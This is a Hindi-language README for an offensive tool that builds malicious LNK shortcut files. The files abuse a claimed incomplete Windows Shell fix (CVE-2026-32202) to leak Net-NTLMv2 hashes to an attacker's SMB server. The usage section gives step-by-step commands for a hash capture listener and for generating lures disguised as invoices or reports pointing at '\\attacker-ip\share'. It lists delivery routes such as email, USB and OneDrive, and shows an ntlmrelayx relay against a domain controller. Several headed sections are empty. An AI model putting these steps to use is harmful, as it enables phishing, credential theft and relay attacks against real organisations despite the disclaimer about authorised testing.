
लिंक फ़ाइलें उत्पन्न करता है जो Windows Shell UNC हैंडलिंग के माध्यम से Net-NTLMv2 हैश को बाध्य करने के लिए दुर्भावनापूर्ण LNK फ़ाइलें बनाती हैं, जिसमें अधिकृत रेड टीम संचालन के लिए कस्टम SMB लिसनर और रिले एकीकरण शामिल है।
अस्वीकरण
यह टूल केवल अधिकृत रेड टीमिंग और पेनेट्रेशन टेस्टिंग के लिए है।
स्पष्ट अनुमति के बिना सिस्टम के खिलाफ अनधिकृत उपयोग अवैध है।
अपने जोखिम पर उपयोग करें। लेखक किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।
विवरण
अपूर्ण Windows Shell सुरक्षा बाईपास (CVE-2026-32202) के माध्यम से NTLMv2 हैश कोएर्शन। विशेष रूप से तैयार किए गए LNK फ़ाइलें बनाता है जो Explorer में खोलने या प्रीव्यू करने पर SMB/UNC प्रमाणीकरण को बाध्य करती हैं। कम इंटरैक्शन, पैच किए गए सिस्टम पर काम करता है जहां अप्रैल 2026 का फिक्स अपर्याप्त था। एंगेजमेंट में सक्रिय रूप से उपयोग किया जाता है।
मुख्य विशेषताएं
एक्सप्लॉइट क्या करता है
टूल एक तैयार किया गया .LNK बनाता है जो Target + IconEnvironmentDataBlock / ExtraData संरचनाओं में UNC पथों के Shell के हैंडलिंग का दुरुपयोग करता है। जब पीड़ित फ़ोल्डर ब्राउज़ करता है या फ़ाइल पर होवर/प्रीव्यू करता है, तो Windows Shell हमलावर-नियंत्रित UNC के लिए SMB कनेक्शन शुरू करता है, जिससे मशीन/उपयोगकर्ता का Net-NTLMv2 हैश लीक होता है। लक्ष्य पर कोई कोड निष्पादन नहीं - रिले या क्रैकिंग के लिए क्रेडेंशियल कोएर्शन।
यह क्यों उपयोगी है
परीक्षण किया गया
निर्भरताएँ
इंस्टॉल करें: pip install -r requirements.txt
उपयोग
# 1. कैप्चर सर्वर शुरू करें (हमलावर होस्ट)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt
# 2. दुर्भावनापूर्ण LNK जनरेट करें
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"
# वैकल्पिक: स्थिर या बाईपास मोड
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"
# 3. LNK डिलीवर करें (USB, शेयर, ईमेल अटैचमेंट, OneDrive, आदि)
# 4. टर्मिनल + फ़ाइल में हैश की प्रतीक्षा करें। उदाहरण रिले:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# या RBCD के लिए LDAP रिले, ADCS सर्ट के लिए HTTP, आदि।
एक्सप्लॉइट
सीमाएँ
मूल कारण (संक्षिप्त)
LNK आइकन/टारगेट रिज़ॉल्यूशन के लिए Windows Shell की UNC पथ सैनिटाइज़ेशन और ExtraData ब्लॉक प्रोसेसिंग में अपूर्ण फिक्स। अनधिकृत नेटवर्क स्पूफिंग को ब्लॉक करने के लिए इच्छित सुरक्षा तंत्र अभी भी Shell नेमस्पेस एन्यूमरेशन के दौरान NTLM प्रमाणीकरण ट्रिगर करता है।